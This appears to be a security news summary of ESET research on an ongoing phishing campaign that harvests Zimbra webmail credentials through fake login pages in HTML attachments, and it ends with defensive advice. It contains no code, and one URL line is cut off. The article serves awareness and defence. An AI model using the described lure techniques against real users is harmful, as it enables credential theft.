A new phishing campaign has been uncovered by ESET researchers, targeting users of the Zimbra Collaboration email server. The campaign, which has been active since April 2023 and is still ongoing, aims to collect the credentials of Zimbra account users. Zimbra Collaboration is a popular alternative to enterprise email solutions and is used by small and medium businesses as well as governmental entities.
ESET telemetry data shows that the campaign’s primary targets are located in Poland, followed by Ecuador and Italy. The adversaries do not focus on any specific industry vertical, but rather target organizations that are using Zimbra. So far, the researchers have not been able to attribute this campaign to any known threat actors.
The phishing emails used in this campaign contain an HTML file as an attachment. The email typically warns the recipient about an email server update, account deactivation, or a similar issue, and instructs them to click on the attached file. The From: field of the email is spoofed to appear as if it is from an email server administrator, adding to its authenticity.
When the attachment is opened, the user is presented with a fake Zimbra login page that is customized according to the targeted organization. The HTML file is opened in the victim’s browser, making it appear as if they have been directed to the legitimate login page. However, the URL actually points to a local file path. The login form even has the Username field pre-filled, making it look more legitimate.
Unbeknownst to the victim, their entered credentials are collected from the HTML form and sent via an HTTPS POST request to a server controlled by the attackers. The URL pattern used for the POST request destination is (https://
Interestingly, ESET researchers have observed instances where subsequent waves of phishing emails were sent from Zimbra accounts of previously targeted legitimate companies. This suggests that the attackers were able to compromise the administrator accounts of these companies and create new mailboxes to send phishing emails to other targets. It is suspected that the attackers relied on password reuse by the targeted administrators, using the same credentials for both email and administration purposes.
While this campaign relies solely on social engineering and user interaction, similar phishing campaigns have employed more sophisticated techniques. In one previous campaign described by Proofpoint, an APT group known as Winter Vivern exploited a vulnerability in webmail portals to target military, government, and diplomatic entities. Another example involved a group called TEMP_Heretic, which abused a vulnerability in the Calendar feature of Zimbra Collaboration to exfiltrate emails from European government and media organizations.
The current campaign may not be technologically advanced, but it is still able to spread and compromise organizations that use Zimbra Collaboration. The fact that the phishing emails contain legitimate code in the HTML attachments makes them harder to detect by traditional antispam policies. As Zimbra Collaboration is often used by organizations with lower IT budgets, it remains an attractive target for adversaries.
In conclusion, this phishing campaign targeting users of Zimbra Collaboration is an ongoing threat that organizations using this email server should be aware of. It is important for users to be cautious of emails that request them to click on attachments and provide their login credentials. Organizations should also consider implementing multi-factor authentication and regularly updating their systems to protect against known vulnerabilities.